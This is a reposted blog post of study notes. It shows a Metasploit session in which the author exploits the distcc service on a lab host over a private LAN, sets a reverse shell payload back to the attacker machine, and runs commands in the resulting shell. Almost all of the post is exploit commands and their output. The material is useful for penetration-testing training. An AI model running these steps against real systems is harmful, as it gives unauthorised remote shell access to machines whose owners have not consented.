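I went travelling last week and came back utterly exhausted; I really can't understand why so many people pay money to suffer like that. Here is an update for today. I have recently been working on a video tutorial for 51, and I still haven't recovered since getting back from the trip, so consider this a set of study notes.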
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
System information as of Wed Jul 31 14:55:12 CST 2013
System load: 0.31 Processes: 149
Usage of /: 72.0% of 19.06GB Users logged in: 1
Memory usage: 25% IP address for eth0: 192.168.11.40
Swap usage: 3%
=> There is 1 zombie process.
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Wed Jul 31 14:31:36 2013 from 192.168.11.5
root@bt:~#
root@bt:~#
root@bt:~# msfpro
[*] Starting Metasploit Console...
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1138 exploits - 718 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 192.168.11.17
RHOST => 192.168.11.17
msf exploit(distcc_exec) > set LHOST 192.168.11.40
LHOST => 192.168.11.40
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ruCpcMy2m0BrAfbq;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ruCpcMy2m0BrAfbq\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.11.40:4444 -> 192.168.11.17:58472) at 2013-07-31 14:59:21 +0800
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
cd /
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
This article is reposted from the 文东会 blog on 51CTO. Original link: http://blog.51cto.com/hackerwang/1261479. To republish it, please contact the original author yourself.
谢文东666